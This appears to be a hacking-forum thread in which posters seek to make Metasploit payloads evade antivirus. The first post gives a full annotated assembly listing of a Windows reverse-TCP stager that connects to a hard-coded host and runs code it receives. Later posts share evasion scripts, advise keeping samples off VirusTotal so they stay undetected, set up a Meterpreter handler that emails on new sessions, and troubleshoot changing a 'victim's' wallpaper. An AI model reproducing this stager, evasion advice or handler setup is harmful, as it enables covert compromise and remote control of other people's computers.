
Thread: create a payload undetectable

  1. #1

    create a payload undetectable

    I have this assembly listing of the payload, but I can't make it undetectable by antivirus.
    ; ----------------------------------------------------------------------
    ; Disassembly of a 32-bit Windows reverse-TCP stager (Metasploit style).
    ; Syntax: Intel, x86-32, Windows (the only library it names is "ws2_32").
    ;
    ; Layout:
    ;   entrypoint_0 .. loc_89h : hash-based API resolver ("block_api").
    ;       Walks PEB -> Ldr -> InMemoryOrderModuleList, hashes every module
    ;       name (ROR-13 over upper-cased bytes) and every export name, and
    ;       tail-jumps to the export whose (module hash + name hash) equals the
    ;       dword the caller pushed right before `call ebp`.
    ;   sub_8fh                 : payload body. Loads ws2_32, then (the raw
    ;       `db` bytes at @0a2h..@121h, hand-decoded in the comments below)
    ;       WSAStartup / WSASocketA / connect (5 retries) / recv stage length /
    ;       VirtualAlloc RWX / recv loop / ret into the received stage.
    ;
    ; Grounding of the comments:
    ;   * Structure offsets (PEB +0ch/+14h, LDR entry +10h/+26h/+28h, PE +3ch/
    ;     +78h, export directory +18h/+1ch/+20h/+24h) are the publicly
    ;     documented 32-bit Windows layouts; the code asserts them, this review
    ;     did not re-verify them against a target.
    ;   * API names written next to hash constants are the commonly published
    ;     block_api values for those hashes -- confirm with a hash tool before
    ;     relying on them.
    ;
    ; Review notes:
    ;   * '.text' is declared rwx: writable AND executable (W^X violation).
    ;   * The six instructions at loc_15h between `movzx ecx, ...` and
    ;     `xor edi, edi` are dead code (see inline notes). They carry no
    ;     @offset/encoding annotation and @18h+4 == @1ch, i.e. they were pasted
    ;     into the listing after disassembly, not emitted from the bytes.
    ;   * The C2 endpoint is hard-coded in the bytes at @0c0h
    ;     (AF_INET, 192.168.1.132:443); it must match the listening handler.
    ;   * The received stage length and stage bytes are attacker/peer
    ;     controlled and are executed from a PAGE_EXECUTE_READWRITE buffer
    ;     with no length sanity check, no VirtualAlloc NULL check and no recv
    ;     error check.
    ; ----------------------------------------------------------------------
    .section '.text' rwx                        ; NOTE(review): writable + executable section (W^X violation)
    .entrypoint
    entrypoint_0:
        cld                                          ; @0  fc  -- DF=0: both lodsb loops below walk forward
        call sub_8fh                                 ; @1  e889000000  x:sub_8fh -- pushes @6 as return address; sub_8fh pops it into ebp, so `call ebp` == call the resolver below
        pushad                                       ; @6  60  -- resolver entry. Stack now: 8 saved regs, caller's return address, caller's hash dword
        mov ebp, esp                                 ; @7  89e5  -- frame: [ebp+24h] = wanted hash (8*4 + 4 bytes up); [ebp-8] = module hash once pushed at @2fh
        xor edx, edx                                 ; @9  31d2  
        mov edx, fs:[edx+30h]                        ; @0bh  648b5230  r4:segment_base_fs+30h -- edx = TEB->Peb (fs:[30h] on 32-bit Windows)
        mov edx, [edx+0ch]                           ; @0fh  8b520c  r4:unknown -- edx = PEB->Ldr
        mov edx, [edx+14h]                           ; @12h  8b5214  r4:unknown -- edx = Ldr->InMemoryOrderModuleList.Flink (first LDR_DATA_TABLE_ENTRY, via its InMemoryOrder link)
    
    
    // Xrefs: 8dh
    loc_15h:
        mov esi, [edx+28h]                ; @15h  8b7228  r4:unknown -- esi = BaseDllName.Buffer (UTF-16 module name)
        movzx ecx, word ptr [edx+26h]        ; @18h  0fb74a26  r2:unknown -- ecx = BaseDllName.MaximumLength, the byte count hashed below (UTF-16, so the 00 high bytes are hashed too)
        mov edi, ecx                ; -- BEGIN dead code (no @offset: not in the disassembled bytes). edi is overwritten at @1ch anyway
        push edi                    ; push/pop of the same register: net no-op
        pop edi                    ; 
        mov edi, ecx                ; edi already equals ecx
        xor ecx, ecx                ; ecx is restored on the next line ...
        mov ecx, edi                ; ... so ecx is unchanged -- END dead code; register state at @1ch is identical with or without these six lines
        xor edi, edi                ; @1ch  31ff -- edi = running module-name hash
    
    
    // Xrefs: 2ch
    loc_1eh:
        xor eax, eax                                 ; @1eh  31c0  -- eax = 0 (the export loop at @5ch relies on ah == 0 the same way)
        lodsb                                        ; @20h  ac  -- al = next byte of the name, esi++
        cmp al, 61h                                  ; @21h  3c61  -- below 'a'? (signed compare: bytes >= 80h also take the jump and are hashed as-is)
        jl loc_27h                                   ; @23h  7c02  x:loc_27h
    
        sub al, 20h                                  ; @25h  2c20  -- fold lower case to upper case so the module hash is case-insensitive
    
    
    // Xrefs: 23h
    loc_27h:
        ror edi, 0dh                                 ; @27h  c1cf0d  -- hash = ror13(hash) + byte
        add edi, eax                                 ; @2ah  01c7  
        loop loc_1eh                                 ; @2ch  e2f0  x:loc_1eh -- ecx = remaining bytes of MaximumLength
    
        push edx                                     ; @2eh  52  -- save position in the module list -> [ebp-4]
        push edi                                     ; @2fh  57  -- save module-name hash            -> [ebp-8]
        mov edx, [edx+10h]                           ; @30h  8b5210  r4:unknown -- edx = DllBase
        mov eax, [edx+3ch]                           ; @33h  8b423c  -- IMAGE_DOS_HEADER.e_lfanew
        add eax, edx                                 ; @36h  01d0  -- eax = IMAGE_NT_HEADERS
        mov eax, [eax+78h]                           ; @38h  8b4078  -- DataDirectory[EXPORT].VirtualAddress
        test eax, eax                                ; @3bh  85c0  
        jz loc_89h                                   ; @3dh  744a  x:loc_89h -- module has no export table: try the next one
    
        add eax, edx                                 ; @3fh  01d0  -- eax = IMAGE_EXPORT_DIRECTORY
        push eax                                     ; @41h  50  -- keep it on the stack; popped at @68h (hit) or @88h (miss)
        mov ecx, [eax+18h]                           ; @42h  8b4818  -- NumberOfNames
        mov ebx, [eax+20h]                           ; @45h  8b5820  -- AddressOfNames (RVA)
        add ebx, edx                                 ; @48h  01d3  
    
    
    // Xrefs: 66h
    loc_4ah:
        jecxz loc_88h                                ; @4ah  e33c  x:loc_88h -- names exhausted (table is scanned backwards): next module
    
        dec ecx                                      ; @4ch  49  
        mov esi, [ebx+4*ecx]                         ; @4dh  8b348b  -- RVA of name[ecx]
        add esi, edx                                 ; @50h  01d6  -- esi -> ASCII export name
        xor edi, edi                                 ; @52h  31ff  -- edi = running export-name hash
    
    
    // Xrefs: 5eh
    loc_54h:
        xor eax, eax                                 ; @54h  31c0  
        lodsb                                        ; @56h  ac  
        ror edi, 0dh                                 ; @57h  c1cf0d  -- same ror13/add hash; the terminating NUL is folded in as well
        add edi, eax                                 ; @5ah  01c7  
        cmp al, ah                                   ; @5ch  38e0  -- ah == 0: stop after the NUL byte
        jnz loc_54h                                  ; @5eh  75f4  x:loc_54h
    
        add edi, [ebp-8]                             ; @60h  037df8  -- edi = module hash + export hash
        cmp edi, [ebp+24h]                           ; @63h  3b7d24  -- equal to the hash the caller pushed?
        jnz loc_4ah                                  ; @66h  75e2  x:loc_4ah
    
        pop eax                                      ; @68h  58  -- eax = IMAGE_EXPORT_DIRECTORY (pushed at @41h)
        mov ebx, [eax+24h]                           ; @69h  8b5824  -- AddressOfNameOrdinals (RVA)
        add ebx, edx                                 ; @6ch  01d3  
        mov cx, [ebx+2*ecx]                          ; @6eh  668b0c4b  -- ordinal; 16-bit write, relies on the high half of ecx already being 0
        mov ebx, [eax+1ch]                           ; @72h  8b581c  -- AddressOfFunctions (RVA)
        add ebx, edx                                 ; @75h  01d3  
        mov eax, [ebx+4*ecx]                         ; @77h  8b048b  -- function RVA
        add eax, edx                                 ; @7ah  01d0  -- eax = function VA
        mov [esp+24h], eax                           ; @7ch  89442424  -- overwrite the saved-eax slot of pushad so popad hands the API address back in eax
        pop ebx                                      ; @80h  5b  -- drop module hash
        pop ebx                                      ; @81h  5b  -- drop module-list position
        popad                                        ; @82h  61  -- restore caller's registers (eax = resolved API)
        pop ecx                                      ; @83h  59  -- caller's return address
        pop edx                                      ; @84h  5a  -- discard the hash argument
        push ecx                                     ; @85h  51  -- return address back on top ...
        jmp eax                                      ; @86h  ffe0  -- ... so the API consumes the caller's pushed args and returns straight to the caller
    
    
    // Xrefs: 4ah
    loc_88h:
        pop eax                                      ; @88h  58  -- drop saved export directory
    
    
    // Xrefs: 3dh
    loc_89h:
        pop edi                                      ; @89h  5f  -- drop module hash
        pop edx                                      ; @8ah  5a  -- restore module-list position
        mov edx, [edx]                               ; @8bh  8b12  r4:unknown -- Flink: next module. No end-of-list check: an unmatched hash keeps walking the (circular) list
        jmp loc_15h                                  ; @8dh  eb86  x:loc_15h
    
    
    // Xrefs: 1
    sub_8fh:
    // function binding: ebp -> dword ptr [esp], esp -> esp-10h
    // function ends at 0a0h
    // NOTE(review): "ends at 0a0h" / "noreturn" are disassembler guesses; `call ebp` returns to @0a2h and the db bytes below are the rest of the code.
        pop ebp                                      ; @8fh  5d  -- ebp = @6, the resolver entry (return address pushed by `call sub_8fh`)
        push 3233h                                   ; @90h  6833320000  -- "32\0\0"
        push 5f327377h                               ; @95h  687773325f  -- "ws2_"  => NUL-terminated "ws2_32" now on the stack
        push esp                                     ; @9ah  54  -- lpLibFileName -> "ws2_32"
        push 726774ch                                ; @9bh  684c772607  -- hash 0726774ch (LoadLibraryA)
        call ebp                                     ; @0a0h  ffd5  endsub sub_8fh noreturn -- LoadLibraryA("ws2_32"); falls through to @0a2h
    db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h -- b8 90010000 mov eax,190h; 29c4 sub esp,eax (400-byte WSADATA); 54 push esp (lpWSAData); 50 push eax (wVersionRequested=190h); 68 29806b00 push hash 006b8029h (WSAStartup)
    db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h -- ffd5 call ebp (WSAStartup); 50x4 push eax (relies on eax==0 on success: dwFlags, g, lpProtocolInfo, protocol); 40 50 push 1 (SOCK_STREAM); 40 50 push 2 (AF_INET); 68 ea0fdfe0 push hash e0df0feah (WSASocketA); ff..
    db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 84h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h -- ..d5 call ebp (WSASocketA); 97 xchg eax,edi (edi = socket, unchecked); 6a05 push 5 (connect retry counter, read back as [esi+8]); 68 c0a80184 push sin_addr = 192.168.1.132; 68 020001bb push sin_family=2 (AF_INET), sin_port=01bbh = 443 network order; 89e6 mov esi,esp (esi -> sockaddr_in)
    db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h -- @0d0h: 6a10 push 16 (namelen); 56 push esi (name); 57 push edi (s); 68 99a57461 push hash 6174a599h (connect); ffd5 call ebp; 85c0 test eax,eax; 740c jz @0ebh (connected); ff..
    db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h -- ..4e08 dec dword [esi+8] (retry counter); 75ec jnz @0d0h (retry connect); 68 f0b5a256 push hash 56a2b5f0h (ExitProcess); ffd5 call ebp (give up after 5 failures); @0ebh: 6a00 push 0 (flags); 6a04 push 4 (len); 56 push esi (buf = stack)
    db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h -- 57 push edi (s); 68 02d9c85f push hash 5fc8d902h (recv); ffd5 call ebp (read 4-byte stage length, return value unchecked); 8b36 mov esi,[esi] (esi = stage length, peer-controlled, unbounded); 6a40 push 40h (PAGE_EXECUTE_READWRITE); 68 00100000 push 1000h (MEM_COMMIT) ..
    db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h -- ..; 56 push esi (dwSize); 6a00 push 0 (lpAddress); 68 58a453e5 push hash e553a458h (VirtualAlloc); ffd5 call ebp; 93 xchg eax,ebx (ebx = RWX buffer, no NULL check); 53 push ebx (kept as the final `ret` target); @10dh: 6a00 push 0 (flags); 56 push esi (bytes remaining)
    db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h -- 53 push ebx (cursor); 57 push edi (s); 68 02d9c85f push hash 5fc8d902h (recv); ffd5 call ebp; 01c3 add ebx,eax; 29c6 sub esi,eax (recv result unchecked: 0 or SOCKET_ERROR=-1 corrupts cursor/remaining); 85f6 test esi,esi; 75..
    db 0ech, 0c3h                                              ; @120h -- ..ec jnz @10dh (receive loop); c3 ret -> pops the buffer address pushed at @10ch and executes the received stage

  2. #2
    This one got past my ESET antivirus/firewall: http://pastebin.com/7xmvGnks
    You may need launch_and_migrate.rb for it.

    0pt1k

  3. #3
    I'm going to try it, thanks. I'll see whether it passes VirusTotal.
    Great job.

  4. #4
    Don't upload your payloads to VirusTotal! Samples submitted there are shared with the antivirus vendors, so a payload that is clean today will get a signature and be detected soon after.

  5. #5
    Thanks for the advice.

  6. #6
    The script you gave me does not get past my Avast: I set the random number to about 20000 and the encoding count to 30, and Avast still detects the payload and removes it automatically.

  7. #7
    I found this plugin for MSF, but I can't get it to send the notification to the mail address.
    The plugin code is here:
    http://pastebin.com/KLU2cYAG
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 9091
    set lhost 192.68.0.2
    set AutoRunScript migrate -n explorer
    load notify_mail
    notify_mail_mailfrom taaaaa@gmail.com
    notify_mail_mailto teeel@gmail.com
    notify_mail_smtpsrv smtp.gmail.com
    notify_mail_smtpport 587
    notify_mail_save
    exploit
    We get the session, but the notification is never sent to the Gmail account.

  8. #8
    Quote (originally posted by Lancha):
    I found this plugin for MSF, but I can't get it to send the notification to the mail address.
    The plugin code is here:
    http://pastebin.com/KLU2cYAG
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lport 9091
    set lhost 192.68.0.2
    set AutoRunScript migrate -n explorer
    load notify_mail
    notify_mail_mailfrom taaaaa@gmail.com
    notify_mail_mailto teeel@gmail.com
    notify_mail_smtpsrv smtp.gmail.com
    notify_mail_smtpport 587
    notify_mail_save
    exploit
    We get the session, but the notification is never sent to the Gmail account.

    Hi Lancha,
    if this helps: the plugin does not talk to Gmail directly.
    Set the port to 25
    and the SMTP server to 127.0.0.1 (localhost),

    then run a local MTA on Kali (Exim4) and let it relay to Gmail:
    configure exim4-config for Gmail relaying,
    run update-exim4.conf,
    and start the exim4 service ... it worked fine for me!

    http://imageshack.us/f/801/mcm2.png/
    http://imageshack.us/f/513/z4cm.png/
    @zoom 1600x1200
    the links to help me for this:
    http://appsparsi.blogspot.it/2011/01...-la-posta.html

    Sorry, it is in Italian -- try translating it.
    Bye

  9. #9
    Thanks,
    it works.
    I found a script to change the victim's wallpaper, but when I run `load walpaper` I get this error:
    Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
    The script is here:
    http://pastebin.com/yPJqCpRy

  10. #10
    Quote (originally posted by Lancha):
    Thanks,
    it works.
    I found a script to change the victim's wallpaper, but when I run `load walpaper` I get this error:
    Failed to load plugin from /opt/metasploit/apps/pro/msf3/plugins/walpaper: undefined local variable or method `client' for main:Object
    The script is here:
    http://pastebin.com/yPJqCpRy
    Hi Lancha,
    maybe we're off topic,
    however:
    the old and dear wallpaper.rb is a Meterpreter script, not a plugin, which is why `load` fails with the `client` error (that variable only exists in a Meterpreter session context). Copy it to the /opt/metasploit/apps/pro/msf3/scripts/meterpreter/ directory and run it from a session with `run`,
    and
    copy the wallpaper background .bmp (e.g. metasploit.bmp) to the /opt/metasploit/apps/pro/msf3/data/ directory.
    .... That seems to work fine!
    http://imageshack.us/f/19/g8qs.png/
    http://imageshack.us/f/41/ju9z.png/
    @zoom 1600x1200
    bye

  11. #11
    Thanks for the help.

  12. #12
    My Avast detects the payload produced with launch_and_migrate.rb.
    Can someone help me?
    I am using the latest version of Avast
    on Windows XP SP3.
